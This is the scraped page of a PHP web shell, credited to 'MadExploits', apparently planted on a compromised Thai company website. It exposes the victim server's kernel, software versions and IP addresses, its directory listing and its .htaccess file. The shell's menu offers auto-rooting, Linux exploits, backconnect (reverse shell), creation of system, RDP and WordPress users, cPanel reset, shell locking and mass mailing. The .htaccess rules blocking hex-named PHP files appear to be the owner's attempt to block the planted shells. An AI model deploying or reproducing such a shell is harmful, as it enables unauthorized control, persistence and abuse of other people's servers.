Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.224.21.144
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Redirect /index.php/products and any sub-paths to /product.php RewriteEngine On RewriteCond %{REQUEST_URI} ^/index\.php/products [NC] RewriteRule ^.*$ https://sniperthailand.com/product.php [R=301,L] RewriteCond %{REQUEST_URI} ^/model/ [OR] RewriteCond %{REQUEST_URI} ^/modules/ [OR] RewriteCond %{REQUEST_URI} ^/assets/ [OR] RewriteCond %{REQUEST_URI} ^/assets2/ [OR] RewriteCond %{REQUEST_URI} ^/img/ [OR] RewriteCond %{REQUEST_URI} ^/lasery/ [OR] RewriteCond %{REQUEST_URI} ^/Structure/ RewriteCond %{REQUEST_URI} !\.(js|css|jpg|jpeg|png|gif|webp|pdf)$ RewriteRule ^(.*)$ / [R=302,L] # Redirect 404 and 400 errors to the home page ErrorDocument 404 https://sniperthailand.com/ ErrorDocument 400 https://sniperthailand.com/ # บล็อกไฟล์ PHP ทั้งหมด <FilesMatch "^[a-f0-9]{8}\.php$"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ CSS ที่มีชื่อเป็นตัวเลข hex 8 หลัก <FilesMatch ".*/[a-f0-9]{8}\.css"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ที่มีนามสกุล ".ccss" <FilesMatch "\.ccss$"> Order Allow,Deny Deny from all </FilesMatch>
Close